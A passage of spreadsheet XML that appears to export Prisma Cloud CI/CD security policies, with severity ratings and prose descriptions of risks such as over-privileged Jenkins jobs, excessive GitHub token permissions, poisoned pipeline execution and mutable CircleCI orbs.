          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC277" t="inlineStr"/>
      <c r="AD277" t="b">
        <v>1</v>
      </c>
      <c r="AE277" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF277" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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7" t="inlineStr">
        <is>
          <t>2737e132-600f-44d2-a159-302e45d1fbcb</t>
        </is>
      </c>
      <c r="AI277" t="inlineStr"/>
      <c r="AJ277" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK277" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" t="inlineStr"/>
      <c r="B278" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C278" s="2" t="inlineStr"/>
      <c r="D278" t="inlineStr"/>
      <c r="E278" t="inlineStr"/>
      <c r="F278" t="inlineStr"/>
      <c r="G278" t="b">
        <v>1</v>
      </c>
      <c r="H2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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J278" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="K278" t="inlineStr">
        <is>
          <t>Jenkins jobs can be executed with high privileges</t>
        </is>
      </c>
      <c r="L278" t="inlineStr"/>
      <c r="M278" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N278" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O278" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P278" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q278" t="inlineStr"/>
      <c r="R278" t="inlineStr"/>
      <c r="S278" t="inlineStr"/>
      <c r="T278" t="b">
        <v>0</v>
      </c>
      <c r="U278" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V278" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="W278" t="inlineStr">
        <is>
          <t>Each executed Jenkins job is assigned with the privileges of a Jenkins user. These privileges are used to interact with the Jenkins system, and include creating jobs, running builds, and executing on the various configured Jenkins nodes. The current authorization configuration on the Jenkins instance allows administrators to configure it to run with the Jenkins SYSTEM user account (that should not be confused with the operating system user). This user account has high privileges over the system, and is allowed to perform any action on the Jenkins instance. Any job configured to run with the context of this user account allows an attacker executing malicious code in the job to take advantage of it to perform impactful actions on the Jenkins instance and its nodes. For more information about access controls for builds: https://www.jenkins.io/doc/book/security/build-authorization/</t>
        </is>
      </c>
      <c r="X278" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-jobs-exe-highpriv</t>
        </is>
      </c>
      <c r="Y278" t="inlineStr"/>
      <c r="Z278" t="inlineStr">
        <is>
          <t>{"category":"Pipeline-Based Access Controls (PBAC)","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA278" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB278" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC278" t="inlineStr"/>
      <c r="AD278" t="b">
        <v>1</v>
      </c>
      <c r="AE278" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF278" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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8" t="inlineStr">
        <is>
          <t>fb7948da-8999-49a2-b79b-f6d1a16678ed</t>
        </is>
      </c>
      <c r="AI278" t="inlineStr"/>
      <c r="AJ278" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK278" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" t="inlineStr"/>
      <c r="B279" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C279" s="2" t="inlineStr"/>
      <c r="D279" t="inlineStr"/>
      <c r="E279" t="inlineStr"/>
      <c r="F279" t="inlineStr"/>
      <c r="G279" t="b">
        <v>1</v>
      </c>
      <c r="H2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9" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J279" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="K279" t="inlineStr">
        <is>
          <t>Excessive GitHub Actions pipeline permissions on the repository</t>
        </is>
      </c>
      <c r="L279" t="inlineStr"/>
      <c r="M279" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N279" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O279" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P279" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q279" t="inlineStr"/>
      <c r="R279" t="inlineStr"/>
      <c r="S279" t="inlineStr"/>
      <c r="T279" t="b">
        <v>0</v>
      </c>
      <c r="U279" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V279" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="W279" t="inlineStr">
        <is>
          <t>When a pipeline is executed, GitHub creates a short-lived token for interacting with the repository named GITHUB_TOKEN. If permissions granted to the GITHUB_TOKEN are not defined in the pipeline's yaml file, the pipeline's default permissions are set to either 'read and write' (default setting) or 'read repository contents' for all scopes, without considering the specific requirements of the workflow. Another security concern is when either “read-all” or “write-all” permissions are defined in a pipeline, as this grants the GITHUB_TOKEN permissions to all scopes. An attacker gaining access to a GitHub Actions pipeline with excessive permissions can take full advantage of the permissive GITHUB_TOKEN.</t>
        </is>
      </c>
      <c r="X279" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gha-excessive-pipeline-permissions-repo</t>
        </is>
      </c>
      <c r="Y279" t="inlineStr"/>
      <c r="Z279" t="inlineStr">
        <is>
          <t>{"category":"Pipeline-Based Access Controls (PBAC)","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA279" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB279" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC279" t="inlineStr"/>
      <c r="AD279" t="b">
        <v>1</v>
      </c>
      <c r="AE279" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF279" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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9" t="inlineStr">
        <is>
          <t>9f055d02-6cbd-457e-8042-4348dde84ee9</t>
        </is>
      </c>
      <c r="AI279" t="inlineStr"/>
      <c r="AJ279" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK279" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" t="inlineStr"/>
      <c r="B280" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C280" s="2" t="inlineStr"/>
      <c r="D280" t="inlineStr"/>
      <c r="E280" t="inlineStr"/>
      <c r="F280" t="inlineStr"/>
      <c r="G280" t="b">
        <v>1</v>
      </c>
      <c r="H2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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J280" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="K280" t="inlineStr">
        <is>
          <t>Jenkins jobs are executed with high privileges by default</t>
        </is>
      </c>
      <c r="L280" t="inlineStr"/>
      <c r="M280" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N280" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O280" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P280" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q280" t="inlineStr"/>
      <c r="R280" t="inlineStr"/>
      <c r="S280" t="inlineStr"/>
      <c r="T280" t="b">
        <v>0</v>
      </c>
      <c r="U280" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V280" t="inlineStr">
        <is>
          <t>CI/CD:Pipeline-Based Access Controls (PBAC):</t>
        </is>
      </c>
      <c r="W280" t="inlineStr">
        <is>
          <t>Each executed Jenkins job is assigned with the privileges of a Jenkins user. These privileges are used to interact with the Jenkins system, and include creating jobs, running builds, and executing on the various configured Jenkins nodes. By default, Jenkins jobs run with the Jenkins SYSTEM user account (that should not be confused with the operating system user). This user account has high privileges over the system, and is allowed to perform any action on the Jenkins instance. Thus, any newly created job runs with the highest level of privileges, unless specifically set otherwise by an administrator. An attacker executing malicious code in a job running with SYSTEM privileges can take advantage of it to perform impactful actions on the Jenkins instance and its nodes. For more information about access controls for builds: https://www.jenkins.io/doc/book/security/build-authorization/</t>
        </is>
      </c>
      <c r="X280" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-jobs-default-high-priv</t>
        </is>
      </c>
      <c r="Y280" t="inlineStr"/>
      <c r="Z280" t="inlineStr">
        <is>
          <t>{"category":"Pipeline-Based Access Controls (PBAC)","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA280" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB280" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC280" t="inlineStr"/>
      <c r="AD280" t="b">
        <v>1</v>
      </c>
      <c r="AE280" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF280" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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0" t="inlineStr">
        <is>
          <t>ba398c74-f326-4945-af65-45f8c133c656</t>
        </is>
      </c>
      <c r="AI280" t="inlineStr"/>
      <c r="AJ280" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK280" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" t="inlineStr"/>
      <c r="B281" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C281" s="2" t="inlineStr"/>
      <c r="D281" t="inlineStr"/>
      <c r="E281" t="inlineStr"/>
      <c r="F281" t="inlineStr"/>
      <c r="G281" t="b">
        <v>1</v>
      </c>
      <c r="H2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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J281" t="inlineStr">
        <is>
          <t>CI/CD:Poisoned Pipeline Execution (PPE):</t>
        </is>
      </c>
      <c r="K281" t="inlineStr">
        <is>
          <t>Direct Poisoned Pipeline Execution</t>
        </is>
      </c>
      <c r="L281" t="inlineStr"/>
      <c r="M281" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N281" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O281" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P281" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q281" t="inlineStr"/>
      <c r="R281" t="inlineStr"/>
      <c r="S281" t="inlineStr"/>
      <c r="T281" t="b">
        <v>0</v>
      </c>
      <c r="U281" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V281" t="inlineStr">
        <is>
          <t>CI/CD:Poisoned Pipeline Execution (PPE):</t>
        </is>
      </c>
      <c r="W281" t="inlineStr">
        <is>
          <t>Poisoned Pipeline Execution (PPE) risks refer to the ability of an attacker with access to source control systems - and without access to the build environment, to manipulate the build process by injecting malicious code/commands into the build pipeline configuration, essentially 'poisoning' the pipeline and running malicious code as part of the build process. The PPE vector abuses permissions against an SCM repository, in a way that causes a CI pipeline to execute malicious commands. Users that have permissions to manipulate the CI configuration files, or other files which the CI pipeline job relies on, can modify them to contain malicious commands, ultimately \"poisoning\" the CI pipeline executing these commands. Pipelines executing unreviewed code, for example those which are triggered directly off of pull requests or commits to arbitrary repository branches, are more susceptible to PPE. The reason is that these scenarios, by design, contain code which has not undergone any reviews or approvals. Once able to execute malicious code within the CI pipeline, the attacker can conduct a wide array of malicious operations, all within the context of the pipeline`s identity. In a D-PPE scenario, the attacker modifies the CI config file in a repository they have access to, either by pushing the change directly to an unprotected remote branch on the repo, or by submitting a PR with the change from a branch or a fork. Since the CI pipeline execution is triggered off of the \"push\" or \"PR\" events, and the pipeline execution is defined by the commands in the modified CI configuration file, the attacker`s malicious commands ultimately run in the build node once the build pipeline is triggered.</t>
        </is>
      </c>
      <c r="X281" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/cross-platform-cicd-pipeline-policies/cp-direct-poison-pipeline-exe</t>
        </is>
      </c>
      <c r="Y281" t="inlineStr"/>
      <c r="Z281" t="inlineStr">
        <is>
          <t>{"category":"Poisoned Pipeline Execution (PPE)","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA281" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB281" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC281" t="inlineStr"/>
      <c r="AD281" t="b">
        <v>1</v>
      </c>
      <c r="AE281" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF281" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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1" t="inlineStr">
        <is>
          <t>34b84bc8-47a9-4385-b1ab-f3d047487f3c</t>
        </is>
      </c>
      <c r="AI281" t="inlineStr"/>
      <c r="AJ281" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK281" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" t="inlineStr"/>
      <c r="B282" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C282" s="2" t="inlineStr"/>
      <c r="D282" t="inlineStr"/>
      <c r="E282" t="inlineStr"/>
      <c r="F282" t="inlineStr"/>
      <c r="G282" t="b">
        <v>1</v>
      </c>
      <c r="H2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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J282" t="inlineStr">
        <is>
          <t>CI/CD:Poisoned Pipeline Execution (PPE):</t>
        </is>
      </c>
      <c r="K282" t="inlineStr">
        <is>
          <t>Direct Poisoned Pipeline Execution by outside collaborators</t>
        </is>
      </c>
      <c r="L282" t="inlineStr"/>
      <c r="M282" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N282" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O282" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P282" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q282" t="inlineStr"/>
      <c r="R282" t="inlineStr"/>
      <c r="S282" t="inlineStr"/>
      <c r="T282" t="b">
        <v>0</v>
      </c>
      <c r="U282" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V282" t="inlineStr">
        <is>
          <t>CI/CD:Poisoned Pipeline Execution (PPE):</t>
        </is>
      </c>
      <c r="W282" t="inlineStr">
        <is>
          <t>Outside collaborators can execute a Direct-PPE attack against the CI/CD pipeline. Outside collaborators are not explicit members of the SCM organization, and are usually used to allow contributors from outside the company (as contractors) to collaborate on specific repositories. In contrast to organization members, where the security of their accounts is the responsibility of the organization (such as mailbox protection, phishing and security awareness), the security level of outside collaborators are outside of the organization's jurisdiction. Poisoned Pipeline Execution (PPE) risks refer to the ability of an attacker with access to source control systems - and without access to the build environment, to manipulate the build process by injecting malicious code/commands into the build pipeline configuration, essentially `poisoning` the pipeline and running malicious code as part of the build process. The PPE vector abuses permissions against an SCM repository, in a way that causes a CI pipeline to execute malicious commands. Users that have permissions to manipulate the CI configuration files, or other files which the CI pipeline job relies on, can modify them to contain malicious commands, ultimately “poisoning” the CI pipeline executing these commands. Pipelines executing unreviewed code, for example those which are triggered directly off of pull requests or commits to arbitrary repository branches, are more susceptible to PPE. The reason is that these scenarios, by design, contain code which has not undergone any reviews or approvals. Once able to execute malicious code within the CI pipeline, the attacker can conduct a wide array of malicious operations, all within the context of the pipeline`s identity. In a D-PPE scenario, the attacker modifies the CI config file in a repository they have access to, either by pushing the change directly to an unprotected remote branch on the repo, or by submitting a PR with the change from a branch or a fork. Since the CI pipeline execution is triggered off of the “push” or ”PR” events, and the pipeline execution is defined by the commands in the modified CI configuration file, the attacker`s malicious commands ultimately run in the build node once the build pipeline is triggered.</t>
        </is>
      </c>
      <c r="X282" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/cross-platform-cicd-pipeline-policies/cp-direct-poison-pipeline-exe-outside-collab</t>
        </is>
      </c>
      <c r="Y282" t="inlineStr"/>
      <c r="Z282" t="inlineStr">
        <is>
          <t>{"category":"Poisoned Pipeline Execution (PPE)","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA282" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB282" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC282" t="inlineStr"/>
      <c r="AD282" t="b">
        <v>1</v>
      </c>
      <c r="AE282" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF282" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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2" t="inlineStr">
        <is>
          <t>637c6918-1608-453a-9075-ea3200dc2673</t>
        </is>
      </c>
      <c r="AI282" t="inlineStr"/>
      <c r="AJ282" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK282" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" t="inlineStr"/>
      <c r="B283" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C283" s="2" t="inlineStr"/>
      <c r="D283" t="inlineStr"/>
      <c r="E283" t="inlineStr"/>
      <c r="F283" t="inlineStr"/>
      <c r="G283" t="b">
        <v>1</v>
      </c>
      <c r="H2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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J283" t="inlineStr">
        <is>
          <t>CI/CD:Supply Chain:</t>
        </is>
      </c>
      <c r="K283" t="inlineStr">
        <is>
          <t>Unrestricted usage of GitHub Actions allowed across the organization</t>
        </is>
      </c>
      <c r="L283" t="inlineStr"/>
      <c r="M283" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N283" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O283" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P283" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q283" t="inlineStr"/>
      <c r="R283" t="inlineStr"/>
      <c r="S283" t="inlineStr"/>
      <c r="T283" t="b">
        <v>0</v>
      </c>
      <c r="U283" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V283" t="inlineStr">
        <is>
          <t>CI/CD:Supply Chain:</t>
        </is>
      </c>
      <c r="W283" t="inlineStr">
        <is>
          <t>Allowing all GitHub Actions to be used in all repositories across the organization regardless of their author, exposes the organization to the risk of a malicious actor taking control over an action's repository. A hijacked action in use in your pipeline can potentially execute malicious code which can reach the production environment.</t>
        </is>
      </c>
      <c r="X283" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/ghactions-unrestrict-accross-org</t>
        </is>
      </c>
      <c r="Y283" t="inlineStr"/>
      <c r="Z283" t="inlineStr">
        <is>
          <t>{"category":"Supply Chain","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA283" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB283" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC283" t="inlineStr"/>
      <c r="AD283" t="b">
        <v>1</v>
      </c>
      <c r="AE283" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF283" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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3" t="inlineStr">
        <is>
          <t>c3085485-c10f-4ab3-882a-3d150507aed4</t>
        </is>
      </c>
      <c r="AI283" t="inlineStr"/>
      <c r="AJ283" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK283" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" t="inlineStr"/>
      <c r="B284" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C284" s="2" t="inlineStr"/>
      <c r="D284" t="inlineStr"/>
      <c r="E284" t="inlineStr"/>
      <c r="F284" t="inlineStr"/>
      <c r="G284" t="b">
        <v>1</v>
      </c>
      <c r="H2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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J284" t="inlineStr">
        <is>
          <t>CI/CD:Supply Chain:</t>
        </is>
      </c>
      <c r="K284" t="inlineStr">
        <is>
          <t>Unrestricted usage of GitHub Actions allowed in the repository</t>
        </is>
      </c>
      <c r="L284" t="inlineStr"/>
      <c r="M284" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N284" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O284" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P284" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q284" t="inlineStr"/>
      <c r="R284" t="inlineStr"/>
      <c r="S284" t="inlineStr"/>
      <c r="T284" t="b">
        <v>0</v>
      </c>
      <c r="U284" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V284" t="inlineStr">
        <is>
          <t>CI/CD:Supply Chain:</t>
        </is>
      </c>
      <c r="W284" t="inlineStr">
        <is>
          <t>Allowing all GitHub Actions to be used in the repository regardless of their author, exposes the organization to the risk of a malicious actor taking control over an action's repository. When using a hijacked action, which is used in your pipeline, it can potentially execute malicious code reaching the production environment.</t>
        </is>
      </c>
      <c r="X284" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/ghactions-unrestricted-usage-allowed-repo</t>
        </is>
      </c>
      <c r="Y284" t="inlineStr"/>
      <c r="Z284" t="inlineStr">
        <is>
          <t>{"category":"Supply Chain","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA284" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB284" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC284" t="inlineStr"/>
      <c r="AD284" t="b">
        <v>1</v>
      </c>
      <c r="AE284" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF284" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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4" t="inlineStr">
        <is>
          <t>69e1458a-aa38-45ee-b66d-5268bdb11a05</t>
        </is>
      </c>
      <c r="AI284" t="inlineStr"/>
      <c r="AJ284" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK284" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" t="inlineStr"/>
      <c r="B285" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C285" s="2" t="inlineStr"/>
      <c r="D285" t="inlineStr"/>
      <c r="E285" t="inlineStr"/>
      <c r="F285" t="inlineStr"/>
      <c r="G285" t="b">
        <v>1</v>
      </c>
      <c r="H2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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J285" t="inlineStr">
        <is>
          <t>CI/CD:Supply Chain:</t>
        </is>
      </c>
      <c r="K285" t="inlineStr">
        <is>
          <t>Mutable orb used in the CircleCI pipeline</t>
        </is>
      </c>
      <c r="L285" t="inlineStr"/>
      <c r="M285" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N285" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O285" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P285" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q285" t="inlineStr"/>
      <c r="R285" t="inlineStr"/>
      <c r="S285" t="inlineStr"/>
      <c r="T285" t="b">
        <v>0</v>
      </c>
      <c r="U285" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V285" t="inlineStr">
        <is>
          <t>CI/CD:Supply Chain:</t>
        </is>
      </c>
      <c r="W285" t="inlineStr">
        <is>
          <t>Volatile or development orbs are mutable, as they can be overwritten with new versions. Malicious actors who gain control of the registry will be able to push a malicious orb with an existing version. The orb will be pulled automatically by the pipeline, leading to code execution in the pipeline.</t>
        </is>
      </c>
      <c r="X285" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/circleci-cicd-pipeline-policies/circleci-mutable-orb</t>
        </is>
      </c>
      <c r="Y285" t="inlineStr"/>
      <c r="Z285" t="inlineStr">
        <is>
          <t>{"category":"Supply Chain","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA285" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB285" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC285" t="inlineStr"/>
      <c r="AD285" t="b">
        <v>1</v>
      </c>
      <c r="AE285" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF285" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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5" t="inlineStr">
        <is>
          <t>9035a61a-7aab-42a4-83be-22117891af90</t>
        </is>
      </c>
      <c r="AI285" t="inlineStr"/>
      <c r="AJ285" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK285" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" t="inlineStr"/>
      <c r="B286" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C286" s="2" t="inlineStr"/>
      <c r="D286" t="inlineStr"/>
      <c r="E286" t="inlineStr"/>
      <c r="F286" t="inlineStr"/>
      <c r="G286" t="b">
        <v>1</v>
      </c>
      <c r="H2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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J286" t="inlineStr">
        <is>
          <t>CI/CD:Supply Chain:</t>
        </is>
      </c>
      <c r="K286" t="inlineStr">
        <is>
          <t>Excessive GitHub App permissions</t>
        </is>
      </c>
      <c r="L286" t="inlineStr"/>
      <c r="M286" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N286" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O286" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P286" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q286" t="inlineStr"/>
      <c r="R286" t="inlineStr"/>
      <c r="S286" t="inlineStr"/>
      <c r="T286" t="b">
        <v>0</v>
      </c>
      <c r="U286" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V286" t="inlineStr">
        <is>
          <t>CI/CD:Supply Chain:</t>
        </is>
      </c>
      <c r="W286" t="inlineStr">
        <is>
          <t>A GitHub App with `write` permissions to an organization that has not performed any actions requiring `write` permissions for more than 30 days may not require these permissions. This poses a threat, as attackers who gain control of the GitHub App can potentially access the organization and its repositories, thereby enlarging the surface of the attack.</t>
        </is>
      </c>
      <c r="X286" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/excessive-ghapp-permissions</t>
        </is>
      </c>
      <c r="Y286" t="inlineStr"/>
      <c r="Z286" t="inlineStr">
        <is>
          <t>{"category":"Supply Chain","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA286" t="inlineStr">
        <is>
